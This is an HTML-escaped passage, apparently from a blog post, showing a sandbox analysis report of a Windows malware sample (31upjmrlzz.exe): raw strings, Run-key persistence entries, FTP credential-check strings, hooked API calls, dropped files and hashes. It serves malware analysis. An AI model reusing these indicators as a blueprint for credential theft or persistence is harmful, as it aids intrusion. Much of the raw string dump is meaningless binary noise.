/&gt;&amp;lt;4&amp;lt;&amp;gt;&amp;lt;T&amp;lt;^&amp;lt;h&amp;lt;&lt;br /&gt;=*=&amp;gt;=D=N=l=u=&lt;br /&gt;&amp;gt;#&amp;gt;)&amp;gt;8&amp;gt;&amp;gt;&amp;gt;O&amp;gt;Y&amp;gt;^&amp;gt;p&amp;gt;u&amp;gt;&lt;br /&gt;?8?L?c?u?&lt;br /&gt;0$1-1H1N1_1n1&lt;br /&gt;313Y3k3&lt;br /&gt;414l4&lt;br /&gt;515B5P5u5&lt;br /&gt;676V6_6f6v6&lt;br /&gt;889Y9r9&lt;br /&gt;:-:G:&lt;br /&gt;;#;(;2;7;&amp;lt;;A;F;W;&lt;br /&gt;&amp;lt;5&amp;lt;?&amp;lt;^&amp;lt;&lt;br /&gt;&amp;lt;W=l=&amp;#124;=&lt;br /&gt;=d&amp;gt;o&amp;gt;{&amp;gt;&lt;br /&gt;?/?U?`?p?&lt;br /&gt;1P2T2X2&lt;br /&gt;3?4a4h4&lt;br /&gt;5A5H5&amp;#124;5&lt;br /&gt;7U8]8f8}8&lt;br /&gt;9'9-939q9&lt;br /&gt;: :%:n:&lt;br /&gt;;1;J;d;&lt;br /&gt;&amp;lt;%&amp;lt;3&amp;lt;&amp;lt;&amp;lt;B&amp;lt;i&amp;lt;v&amp;lt;&lt;br /&gt;=$=+=0===E=L=T=o=v=&lt;br /&gt;=6&amp;gt;E&amp;gt;&lt;br /&gt;?%?4?\?&lt;br /&gt;0'0K0\0s0x0}0&lt;br /&gt;091M1g1t1&lt;br /&gt;3[3q3&lt;br /&gt;3*494&lt;br /&gt;4-575w5~5&lt;br /&gt;5B6L6&lt;br /&gt;6(7I7]7z7&lt;br /&gt;848_9m9w9&lt;br /&gt;:+:1:7:D:Q:V:e:t:&lt;br /&gt;; ;,;8;L;Q;V;n;s;x;};&lt;br /&gt;;5&amp;lt;B&amp;lt;]&amp;lt;w&amp;lt;&lt;br /&gt;=5===B=N=S=g=l=&lt;br /&gt;5&amp;quot;6-6B6L6Q6c6u6&lt;br /&gt;7 70767=7L7R7&lt;br /&gt;94:{:&lt;br /&gt;'010&lt;br /&gt;1.1F1^1&lt;br /&gt;2(2&amp;gt;2P2b2t2&lt;br /&gt;4K5f5&lt;br /&gt;6=6K6Y6&lt;br /&gt;7*7/7L7S7r7&lt;br /&gt;8]8i8&lt;br /&gt;9+9;9A9G9d9q9w9}9&lt;br /&gt;9/:b:h:&lt;br /&gt;;!;S;`;h;s;&lt;br /&gt;;E&amp;lt;e&amp;lt;w&amp;lt;&lt;br /&gt;=.=&amp;lt;=A=F=L=R=k=u=&lt;br /&gt;&amp;gt;#&amp;gt;,&amp;gt;X&amp;gt;&lt;br /&gt;?-?\?y?&lt;br /&gt;42484T4`4f4&lt;br /&gt;4X5]5&amp;#124;5&lt;br /&gt;6-646D6Q6[6b6g6q6z6&lt;br /&gt;9 9&amp;amp;9&amp;lt;9G9R9W9\9q9v9&lt;br /&gt;9::G:M:b:j:z:&lt;br /&gt;;.;6;;;B;H;S;c;k;&lt;br /&gt;&amp;lt;+&amp;lt;F&amp;lt;T&amp;lt;`&amp;lt;&lt;br /&gt;=3=E=Q=&lt;br /&gt;&amp;gt;3&amp;gt;T&amp;gt;k&amp;gt;z&amp;gt;&lt;br /&gt;?Z?r?{?&lt;br /&gt;%0&amp;lt;0V0h0&lt;br /&gt;141&amp;gt;1l1&lt;br /&gt;3g3r3&lt;br /&gt;3\4c4&lt;br /&gt;5*585R5w5&lt;br /&gt;6!6&amp;lt;6R6a6&lt;br /&gt;7=7C7T7g7z7&lt;br /&gt;8-9L9w9&lt;br /&gt;9-:D:W:&lt;br /&gt;;#;4;:;T;Z;&lt;br /&gt;&amp;lt;#&amp;lt;(&amp;lt;-&amp;lt;2&amp;lt;7&amp;lt;P&amp;lt;j&amp;lt;w&amp;lt;&lt;br /&gt;=)=.=K=[=`=}=&lt;br /&gt;&amp;gt;+&amp;gt;I&amp;gt;V&amp;gt;[&amp;gt;s&amp;gt;z&amp;gt;&lt;br /&gt;?*?H?T?a?g?u?&lt;br /&gt;0,0J0Z0g0l0v0&lt;br /&gt;1%101=1C1I1W1s1y1&lt;br /&gt;2'212&amp;lt;2J2_2&lt;br /&gt;3&amp;quot;3@3P3V3&lt;br /&gt;4)4J4h4x4&lt;br /&gt;535Q5s5&lt;br /&gt;6!6.656D6S6`6m6z6&lt;br /&gt;7?7E7&lt;br /&gt;7'8,818[8w8&lt;br /&gt;8.9K9V9s9&lt;br /&gt;:':,:D:T:Y:r:&lt;br /&gt;;2;7;W;r;w;&amp;#124;;&lt;br /&gt;&amp;lt;$&amp;lt;5&amp;lt;&amp;lt;&amp;lt;F&amp;lt;N&amp;lt;b&amp;lt;&lt;br /&gt;=(=I=O=Z=r=&amp;#124;=&lt;br /&gt;&amp;gt;V&amp;gt;g&amp;gt;&amp;#124;&amp;gt;&lt;br /&gt;&amp;gt;#?h?&lt;br /&gt;0-070D0x0&lt;br /&gt;0@1G1&lt;br /&gt;132D2Z2p2&lt;br /&gt;3*343=3R3^3&lt;br /&gt;3-434=4F5P5]5&lt;br /&gt;536N6[6&lt;br /&gt;637B7U7d7q7&lt;br /&gt;818&amp;gt;8T8]8&amp;#124;8&lt;br /&gt;9T9`9o9u9z9&lt;br /&gt;:!:,:3:;:A:O:Y:f:l:r:&lt;br /&gt;;(;3;9;?;Q;];c;i;{;&lt;br /&gt;&amp;lt;&amp;amp;&amp;lt;3&amp;lt;8&amp;lt;G&amp;lt;T&amp;lt;Z&amp;lt;`&amp;lt;n&amp;lt;&lt;br /&gt;&amp;lt;,=3=A=G=W=w=&amp;#124;=&lt;br /&gt;&amp;gt;@&amp;gt;E&amp;gt;\&amp;gt;&lt;br /&gt;&amp;gt;W?`?&lt;br /&gt;010C0H0M0a0f0k0&lt;br /&gt;1 1$1&amp;lt;1M1U1&lt;br /&gt;1-2O2z2&lt;br /&gt;3I3Z3o3z3&lt;br /&gt;4&amp;quot;4'4&amp;lt;4U4_4t4z4&lt;br /&gt;575=5r5&amp;#124;5&lt;br /&gt;6(6=6P6m6z6&lt;br /&gt;7 767&amp;lt;7~7&lt;br /&gt;8A8F8Y8c8j8&lt;br /&gt;999C9&lt;br /&gt;:%:,:3:=:F:e:&lt;br /&gt;;+;=;D;X;];c;i;n;&lt;br /&gt;;.&amp;lt;4&amp;lt;;&amp;lt;@&amp;lt;e&amp;lt;p&amp;lt;w&amp;lt;&lt;br /&gt;=&amp;quot;=*=0=;=F=O=Z=b=g=v={=&lt;br /&gt;=7&amp;gt;N&amp;gt;W&amp;gt;]&amp;gt;&lt;br /&gt;&amp;gt;&amp;amp;?7?~?&lt;br /&gt;40;0A0Q0a0&lt;br /&gt;2)2A2[2&lt;br /&gt;2T3]3f5&lt;br /&gt;6F6Y6t6&lt;br /&gt;7I7Y7_7e7k7q7w7}7&lt;br /&gt;8*808;8~8&lt;br /&gt;9 9O9X9^9&lt;br /&gt;9$:0:Q:&lt;br /&gt;:&amp;amp;;2;8;F;&lt;br /&gt;&amp;lt;&amp;quot;&amp;lt;2&amp;lt;=&amp;lt;Q&amp;lt;W&amp;lt;i&amp;lt;&lt;br /&gt;=$=*=4=:=E=K=S=e=&lt;br /&gt;&amp;gt;;&amp;gt;I&amp;gt;&lt;br /&gt;?!?F?M?W?&lt;br /&gt;1$1&amp;lt;1I1[1g1&lt;br /&gt;2%2&amp;gt;2V2a2t2&amp;#124;2&lt;br /&gt;373E3M3a3l3&lt;br /&gt;3@4N4U4&lt;br /&gt;5/565&amp;lt;5R5k5&lt;br /&gt;666i6&lt;br /&gt;7.7M7&lt;br /&gt;8,818M8[8`8&lt;br /&gt;8?9R9&lt;br /&gt;:#:4:9:?:E:P:{:&lt;br /&gt;;#;B;U;[;b;r;&lt;br /&gt;&amp;lt;!&amp;lt;o&amp;lt;&lt;br /&gt;=$=;=C=N=S=X=i=n=s=}=&lt;br /&gt;&amp;gt;&amp;quot;&amp;gt;(&amp;gt;.&amp;gt;4&amp;gt;:&amp;gt;@&amp;gt;F&amp;gt;L&amp;gt;R&amp;gt;X&amp;gt;^&amp;gt;d&amp;gt;j&amp;gt;p&amp;gt;v&amp;gt;&amp;#124;&amp;gt;&lt;br /&gt;?B?H?N?T?Z?`?f?l?r?x?~?&lt;br /&gt;4 4$4(4,4044484&amp;lt;4@4D4H4L4P4T4X6\6`6h6l6p6t6x6&amp;#124;6&lt;br /&gt;7D7L7X7\7`7d7h7l7p7t7&lt;br /&gt;9(949@9L9X9d9p9&amp;#124;9&lt;br /&gt;:$:0:&amp;lt;:H:T:`:l:x:&lt;br /&gt;; ;$;(;,;0;4;8;&amp;lt;;@;D;H;L;P;T;X;\;`;d;h;&lt;br /&gt;4 4$4(4,4044484&amp;lt;4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4&amp;#124;4&lt;br /&gt;5 5$5(5,5054585&amp;lt;5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5&amp;#124;5&lt;br /&gt;6 6$6(6,6064686&amp;lt;6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6&amp;#124;6&lt;br /&gt;7 7$7(7,7074787&amp;lt;7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7&amp;#124;7&lt;br /&gt;8 8$8(8,8084888&amp;lt;8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8&amp;#124;8&lt;br /&gt;8 9,989D9P9\9h9x9&amp;#124;9&lt;br /&gt;: :(:,:0:8:&amp;lt;:@:X:`:d:h:l:p:x:&amp;#124;:&lt;br /&gt;; ;$;(;,;0;8;&amp;lt;;@;D;H;P;T;X;\;`;h;l;p;t;x;&lt;br /&gt;&amp;lt; &amp;lt;(&amp;lt;,&amp;lt;0&amp;lt;4&amp;lt;8&amp;lt;@&amp;lt;D&amp;lt;H&amp;lt;L&amp;lt;P&amp;lt;X&amp;lt;\&amp;lt;`&amp;lt;d&amp;lt;h&amp;lt;p&amp;lt;t&amp;lt;&amp;#124;&amp;lt;&lt;br /&gt;=(=0=8=@=H=T=\=d=l=&lt;br /&gt;&lt;br /&gt;Unicode Strings:&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;Ajjj&lt;br /&gt;jjjj&lt;br /&gt;jjjj&lt;br /&gt;jjjj&lt;br /&gt;$jjj&lt;br /&gt;Ajjj&lt;br /&gt;DBWIN&lt;br /&gt;\\.\pipe&lt;br /&gt;kernel32.dll&lt;br /&gt;ntdll.dll&lt;br /&gt;Internet Explorer\iexplore.exe&lt;br /&gt;autorun.inf&lt;br /&gt;pidgin.exe&lt;br /&gt;wlcomm.exe&lt;br /&gt;msnmsgr.exe&lt;br /&gt;msmsgs.exe&lt;br /&gt;flock.ex&lt;br /&gt;opera.exe&lt;br /&gt;chrome.exe&lt;br /&gt;ieuser.exe&lt;br /&gt;iexplore.exe&lt;br /&gt;firefox.exe&lt;br /&gt;HKCU\&lt;br /&gt;HKLM\&lt;br /&gt;Microsoft Unified Security Protocol Provider&lt;br /&gt;.ipconfig.exe&lt;br /&gt;verclsid.exe&lt;br /&gt;regedit.exe&lt;br /&gt;rundll32.exe&lt;br /&gt;cmd.exe&lt;br /&gt;regsvr32.exe&lt;br /&gt;l&amp;quot;%s&amp;quot; %S&lt;br /&gt;POST&lt;br /&gt;.exe&lt;br /&gt;lol.exe&lt;br /&gt;n127.0.0.1&lt;br /&gt;%s:Zone.Identifier&lt;br /&gt;wininet.dll&lt;br /&gt;secur32.dll&lt;br /&gt;ws2_32.dll&lt;br /&gt;:%S%S\Desktop.ini&lt;br /&gt;winlogon.exe&lt;br /&gt;explorer.exe&lt;br /&gt;Aadvapi32.dll&lt;br /&gt;urlmon.dll&lt;br /&gt;nspr4.dll&lt;br /&gt;dnsapi.dll&lt;br /&gt;Akernel23.dll&lt;br /&gt;y%s\%s.exe&lt;br /&gt;lsass.exe&lt;br /&gt;Shell&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Policies\System&lt;br /&gt;.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;&lt;br /&gt;&lt;/code&gt;&lt;/pre&gt;&lt;br /&gt;31upjmrlzz.exe&lt;br /&gt;&lt;br /&gt;&lt;pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"&gt;&lt;code&gt;Processes:&lt;br /&gt;PID    ParentPID    User    Path    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;768    1176        C:\Documents and Settings\Mes documents\31upjmrlzz.exe    &lt;br /&gt;&lt;br /&gt;Ports:&lt;br /&gt;Port    PID    Type    Path    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;&lt;br /&gt;Explorer Dlls:&lt;br /&gt;DLL Path    Company Name    File Description    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;No changes Found            &lt;br /&gt;&lt;br /&gt;IE Dlls:&lt;br /&gt;DLL Path    Company Name    File Description    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;No changes Found            &lt;br /&gt;&lt;br /&gt;Loaded Drivers:&lt;br /&gt;Driver File    Company Name    Description    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;&lt;br /&gt;Monitored RegKeys&lt;br /&gt;Registry Key    Value    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;&lt;br /&gt;Kernel31 Api Log&lt;br /&gt;    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;***** Installing Hooks *****    &lt;br /&gt;719f74df     RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters)    &lt;br /&gt;719f80c4     RegOpenKeyExA (Protocol_Catalog9)    &lt;br /&gt;719f777e     RegOpenKeyExA (00000095)    &lt;br /&gt;719f764d     RegOpenKeyExA (Catalog_Entries)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000001)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000002)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000003)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000004)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000005)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000006)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000007)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000008)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000009)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000010)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000011)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000012)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000013)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000014)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000015)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000016)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000017)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000018)    &lt;br /&gt;719f7cea     RegOpenKeyExA (000000000019)    &lt;br /&gt;719f2623     WaitForSingleObject(77c,0)    &lt;br /&gt;719f87c6     RegOpenKeyExA (NameSpace_Catalog5)    &lt;br /&gt;719f777e     RegOpenKeyExA (00000039)    &lt;br /&gt;719f835b     RegOpenKeyExA (Catalog_Entries)    &lt;br /&gt;719f84ef     RegOpenKeyExA (000000000001)    &lt;br /&gt;719f84ef     RegOpenKeyExA (000000000002)    &lt;br /&gt;719f84ef     RegOpenKeyExA (000000000003)    &lt;br /&gt;719f84ef     RegOpenKeyExA (000000000004)    &lt;br /&gt;719f2623     WaitForSingleObject(774,0)    &lt;br /&gt;719e1af2     RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Winsock2\Parameters)    &lt;br /&gt;719e198e     GlobalAlloc()    &lt;br /&gt;7c80b72f     ExitThread()    &lt;br /&gt;7d2454bb     LoadLibraryA(KERNEL32.DLL)=7c800000    &lt;br /&gt;7d2454bb     LoadLibraryA(MSVBVM60.DLL )=73370000    &lt;br /&gt;73371c38     GetCommandLineA()    &lt;br /&gt;73372f57     CreateMutex((null))    &lt;br /&gt;7d23eab5     WaitForSingleObject(764,7530)    &lt;br /&gt;410df8     LoadLibraryA(KERNEL32.DLL)=7c800000    &lt;br /&gt;410df8     LoadLibraryA(MSVBVM60.DLL )=73370000    &lt;br /&gt;733739f4     GetCommandLineA()    &lt;br /&gt;7338d1b3     LoadLibraryA(C:\WINDOWS\system32\VB6FR.DLL)=0    &lt;br /&gt;7337452c     GetVersionExA()    &lt;br /&gt;7337476c     LoadLibraryA(OLEAUT32.DLL)=770e0000    &lt;br /&gt;772370b9     GetVersionExA()    &lt;br /&gt;7723711c     GetCommandLineA()    &lt;br /&gt;7337476c     LoadLibraryA(SXS.DLL)=77210000    &lt;br /&gt;774efa66     LoadLibraryA(oleaut32.dll)=770e0000    &lt;br /&gt;73376792     RegOpenKeyA (HKLM\SOFTWARE\Microsoft\VBA\Monitors)    &lt;br /&gt;77daeff6     RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\VBA\Monitors)    &lt;br /&gt;770fc957     LoadLibraryA(C:\WINDOWS\system32\kernel32.dll)=7c800000    &lt;br /&gt;7337a15b     LoadLibraryA(kernel32.dll)=7c800000    &lt;br /&gt;406f1e     LoadLibraryA(kernel32)=7c800000    &lt;br /&gt;7337a15b     LoadLibraryA(kernel32)=7c800000    &lt;br /&gt;7337a15b     LoadLibraryA(USER32)=7e390000    &lt;br /&gt;7345d09c     CreateFileA(C:\Documents and Settings\Mes documents\31upjmrlzz.exe)    &lt;br /&gt;7345d34f     ReadFile()    &lt;br /&gt;406f1e     LoadLibraryA(NTDLL)=7c910000    &lt;br /&gt;7c8165b3     WaitForSingleObject(74c,64)    &lt;br /&gt;7c8191f8     LoadLibraryA(advapi32.dll)=77da0000    &lt;br /&gt;7337a4c5     GetCurrentProcessId()=1176    &lt;br /&gt;7337bdfa     RegOpenKeyExA (HKLM\Software\Microsoft\Windows)    &lt;br /&gt;7337be1c     RegOpenKeyExA (HTML Help)    &lt;br /&gt;7337be1c     RegOpenKeyExA (Help)    &lt;br /&gt;7337c9ce     WaitForSingleObject(7e4,ffffffff)    &lt;br /&gt;73373657     ExitProcess()    &lt;br /&gt;***** Injected Process Terminated *****    &lt;br /&gt;&lt;br /&gt;DirwatchData&lt;br /&gt;    &lt;br /&gt;--------------------------------------------------&lt;br /&gt;WatchDir Initilized OK    &lt;br /&gt;Watching C:\DOCUME~1\LOCALS~1\Temp    &lt;br /&gt;Watching C:\WINDOWS    &lt;br /&gt;Watching C:\Program Files    &lt;br /&gt;Created: C:\WINDOWS\Prefetch\31UPJMRLZZ.EXE-1EE360EA.pf    &lt;br /&gt;Modifed: C:\WINDOWS\Prefetch\31UPJMRLZZ.EXE-1EE360EA.pf    &lt;br /&gt;Created: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET49CB.tmp    &lt;br /&gt;Created: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET37.tmp    &lt;br /&gt;Deteled: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET37.tmp    &lt;br /&gt;Deteled: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET49CB.tmp    &lt;br /&gt;File: 31upjmrlzz.exe&lt;br /&gt;Size: 116236 Bytes&lt;br /&gt;MD5: 9702091B21C1A48955A5268D07E31EF6&lt;br /&gt;Packer: File not found C:\iDEFENSE\SysAnalyzer\peid.exe&lt;br /&gt;&lt;br /&gt;File Properties: CompanyName      &lt;br /&gt;FileDescription  &lt;br /&gt;FileVersion      &lt;br /&gt;InternalName     &lt;br /&gt;LegalCopyright   &lt;br /&gt;OriginalFilename &lt;br /&gt;ProductName      &lt;br /&gt;ProductVersion   &lt;br /&gt;&lt;br /&gt;Exploit Signatures:&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;Scanning for 19 signatures&lt;br /&gt;Scan Complete: 312Kb in 0,032 seconds&lt;br /&gt;Urls&lt;br /&gt;--------------------------------------------------&lt;br /&gt;http://%s/%s&lt;br /&gt;http://%s/&lt;br /&gt;http://&lt;br /&gt;http://api.wipmania.com/ftp://%s:%s@%s:%d&lt;br /&gt;&lt;br /&gt;RegKeys&lt;br /&gt;--------------------------------------------------&lt;br /&gt;gdatasoftware.&lt;br /&gt;sunbeltsoftware.&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;Software\Microsoft\Windows\CurrentVersion\Policies\System&lt;br /&gt;.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run&lt;br /&gt;&lt;br /&gt;ExeRefs&lt;br /&gt;--------------------------------------------------&lt;br /&gt;File: 31upjmrlzz_dmp.exe_&lt;br /&gt;.exe&lt;br /&gt;%windir%\system32\cmd.exe&lt;br /&gt;&amp;amp;&amp;amp;%%windir%%\explorer.exe %%cd%%%s&lt;br /&gt;%0x.exe&lt;br /&gt;Internet Explorer\iexplore.exe&lt;br /&gt;pidgin.exe&lt;br /&gt;wlcomm.exe&lt;br /&gt;msnmsgr.exe&lt;br /&gt;msmsgs.exe&lt;br /&gt;opera.exe&lt;br /&gt;chrome.exe&lt;br /&gt;ieuser.exe&lt;br /&gt;iexplore.exe&lt;br /&gt;firefox.exe&lt;br /&gt;.ipconfig.exe&lt;br /&gt;verclsid.exe&lt;br /&gt;regedit.exe&lt;br /&gt;rundll32.exe&lt;br /&gt;cmd.exe&lt;br /&gt;regsvr32.exe&lt;br /&gt;.exe&lt;br /&gt;lol.exe&lt;br /&gt;winlogon.exe&lt;br /&gt;explorer.exe&lt;br /&gt;y%s\%s.exe&lt;br /&gt;lsass.exe&lt;br /&gt;&lt;br /&gt;Raw Strings:&lt;br /&gt;--------------------------------------------------&lt;br /&gt;File: 31upjmrlzz_dmp.exe_&lt;br /&gt;MD5:  42157d0a769f0335830e4646c6a00338&lt;br /&gt;Size: 319490&lt;br /&gt;&lt;br /&gt;Ascii Strings:&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;!This program cannot be run in DOS mode.&lt;br /&gt;Rich:&lt;br /&gt;.text&lt;br /&gt;`.rdata&lt;br /&gt;@.data&lt;br /&gt;.reloc&lt;br /&gt;WPVS&lt;br /&gt;t1h(&lt;br /&gt;_[^]&lt;br /&gt;QRPWV&lt;br /&gt;RPQWV&lt;br /&gt;QRPSV&lt;br /&gt;txVhD&lt;br /&gt;uaVhD&lt;br /&gt;QRPSV&lt;br /&gt;SVW3&lt;br /&gt;u3h0&lt;br /&gt;u!h(&lt;br /&gt;u3h0&lt;br /&gt;PQRV&lt;br /&gt;RPQW&lt;br /&gt;u:WhD&lt;br /&gt;u#WhD&lt;br /&gt;QRPW&lt;br /&gt;RPQV&lt;br /&gt;RPQV&lt;br /&gt;PQRV&lt;br /&gt;RPQW&lt;br /&gt;RSSh&lt;br /&gt;vG9u&lt;br /&gt;t0WSV&lt;br /&gt;WVRj&lt;br /&gt;WSPQR&lt;br /&gt;vt9u&lt;br /&gt;t0WSV&lt;br /&gt;WVRj&lt;br /&gt;WSPQR&lt;br /&gt;gfff&lt;br /&gt;WVRj&lt;br /&gt;PWQR&lt;br /&gt;u3h0&lt;br /&gt;u!h(&lt;br /&gt;u3h0&lt;br /&gt;&amp;gt;CAL &lt;br /&gt;uGh4&lt;br /&gt;=MSG t&lt;br /&gt;=SDG &lt;br /&gt;&amp;gt;MSG u`&lt;br /&gt;SVW3&lt;br /&gt;SVW3&lt;br /&gt;9:vP&lt;br /&gt;G;9r&lt;br /&gt;@W;F&lt;br /&gt;Wj h&lt;br /&gt;t&amp;amp;j,j&lt;br /&gt;Wjdj&lt;br /&gt;F4VP&lt;br /&gt;SWf9&lt;br /&gt;t-f;&lt;br /&gt;t=hH&lt;br /&gt;_^[]&lt;br /&gt;=pzC&lt;br /&gt;&amp;#124;04+~4&lt;br /&gt;_^[]&lt;br /&gt;SVWP3&lt;br /&gt;QWSVR&lt;br /&gt;=lzC&lt;br /&gt;QPRWS&lt;br /&gt;RPQS&lt;br /&gt;WQRV&lt;br /&gt;_^[]&lt;br /&gt;_^[]&lt;br /&gt;un9F&lt;br /&gt;t2j h&lt;br /&gt;L9_@vI&lt;br /&gt;;_@r&lt;br /&gt;WVPQR&lt;br /&gt;SQRj&lt;br /&gt;STFU&lt;br /&gt;=pzC&lt;br /&gt;A8j@&lt;br /&gt;QWRPV&lt;br /&gt;B0QPV&lt;br /&gt;=4yA&lt;br /&gt;PQRj&lt;br /&gt;PQRj&lt;br /&gt;SVWh&lt;br /&gt;STFU&lt;br /&gt;Vh@P@&lt;br /&gt;L9^8vE&lt;br /&gt;;^8r&lt;br /&gt;=pzC&lt;br /&gt;hpP@&lt;br /&gt;STFU&lt;br /&gt;PL9^(v^&lt;br /&gt;9+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;;^(r&lt;br /&gt;9~0v/&lt;br /&gt;;~0r&lt;br /&gt;9^8v;&lt;br /&gt;:+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;;^8r&lt;br /&gt;9^@v2&lt;br /&gt;:+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;+=pzC&lt;br /&gt;;^@r&lt;br /&gt;tu9]&lt;br /&gt;RVWPQ&lt;br /&gt;uXWV&lt;br /&gt;QVWRP&lt;br /&gt;u$WP&lt;br /&gt;E$_^[&lt;br /&gt;tpVW&lt;br /&gt;uTVW&lt;br /&gt;E$_^[&lt;br /&gt;E$^[&lt;br /&gt;E$_^[&lt;br /&gt;j&amp;amp;hx&lt;br /&gt;t}hP&lt;br /&gt;QVWh&lt;br /&gt;95hVA&lt;br /&gt;QVht&lt;br /&gt;8POST&lt;br /&gt;tWWV&lt;br /&gt;PQWj&lt;br /&gt;RPQVW&lt;br /&gt;RPQVW&lt;br /&gt;WVRPS&lt;br /&gt;u h(&lt;br /&gt;QWRS&lt;br /&gt;SVWh&lt;br /&gt;SVW3&lt;br /&gt;95PWA&lt;br /&gt;;5PWA&lt;br /&gt;95PWA&lt;br /&gt;;5PWA&lt;br /&gt;VWQh4&lt;br /&gt;t&amp;quot;j V&lt;br /&gt;SVWh&lt;br /&gt;=USERt&lt;br /&gt;=PASS&lt;br /&gt;:Uu#Vh&lt;br /&gt;8Pu.&lt;br /&gt;=FEATt&lt;br /&gt;=TYPEt&lt;br /&gt;=PASVu&lt;br /&gt;=STATt&lt;br /&gt;=LISTu&lt;br /&gt;uuhh&lt;br /&gt;ucWVh&lt;br /&gt;RPQh&lt;br /&gt;PQRh&lt;br /&gt;QRPh&lt;br /&gt;QVh:&lt;br /&gt;Rh~f&lt;br /&gt;_[^]&lt;br /&gt;_[^]&lt;br /&gt;F/PQ&lt;br /&gt;~(WR&lt;br /&gt;T0(RW&lt;br /&gt;t=VW&lt;br /&gt;Qh~f&lt;br /&gt;u4SV&lt;br /&gt;W$RP&lt;br /&gt;tmQh&lt;br /&gt;RSSh&lt;br /&gt;t,PVQ&lt;br /&gt;O,@PQ&lt;br /&gt;TSVW3&lt;br /&gt;WWWWh&lt;br /&gt;F4RP&lt;br /&gt;LSVW3&lt;br /&gt;^&amp;lt;^[&lt;br /&gt;V4QR&lt;br /&gt;vJ9^,u&lt;br /&gt;;F8v&lt;br /&gt;N4PQ&lt;br /&gt;F4RP&lt;br /&gt;F@@PR&lt;br /&gt;F,BRP&lt;br /&gt;u-SSV&lt;br /&gt;RSWWj&lt;br /&gt;8httpu1&lt;br /&gt;u$8H&lt;br /&gt;QRVP&lt;br /&gt;RVPQ&lt;br /&gt;QRVP&lt;br /&gt;RVPQ&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;Qh~f&lt;br /&gt;SVWP&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;Rh~f&lt;br /&gt;hh)A&lt;br /&gt;h`)A&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;tlWP&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;tlWP&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;Rh~f&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;=&amp;#124;[A&lt;br /&gt;_^[]&lt;br /&gt;h0^A&lt;br /&gt;hh^A&lt;br /&gt;SVWj&lt;br /&gt;_^Yj&lt;br /&gt;QPPPPh&lt;br /&gt;h(*A&lt;br /&gt;SVWj,&lt;br /&gt;Vj\P&lt;br /&gt;[@^]&lt;br /&gt;Vj.P&lt;br /&gt;[@^]&lt;br /&gt;QRRj&lt;br /&gt;RRRRf&lt;br /&gt;[_^]&lt;br /&gt;SVWh&lt;br /&gt;h0*A&lt;br /&gt;*t2:&lt;br /&gt;VhH*A&lt;br /&gt;Qh4*A&lt;br /&gt;QSV3&lt;br /&gt;j PhxWA&lt;br /&gt;h`*A&lt;br /&gt;Vj#S&lt;br /&gt;_^[]&lt;br /&gt;Wj*P&lt;br /&gt;^[_]&lt;br /&gt;h0+A&lt;br /&gt;h$+A&lt;br /&gt;SVWh&lt;br /&gt;VVVV&lt;br /&gt;WWVS&lt;br /&gt;SVW3&lt;br /&gt;RVh-&lt;br /&gt;@PVj&lt;br /&gt;PVh-&lt;br /&gt;VhH+A&lt;br /&gt;SVW3&lt;br /&gt;@PVj&lt;br /&gt;RVj&amp;quot;W&lt;br /&gt;hT+A&lt;br /&gt;hT+A&lt;br /&gt;h&amp;#124;+A&lt;br /&gt;ht+A&lt;br 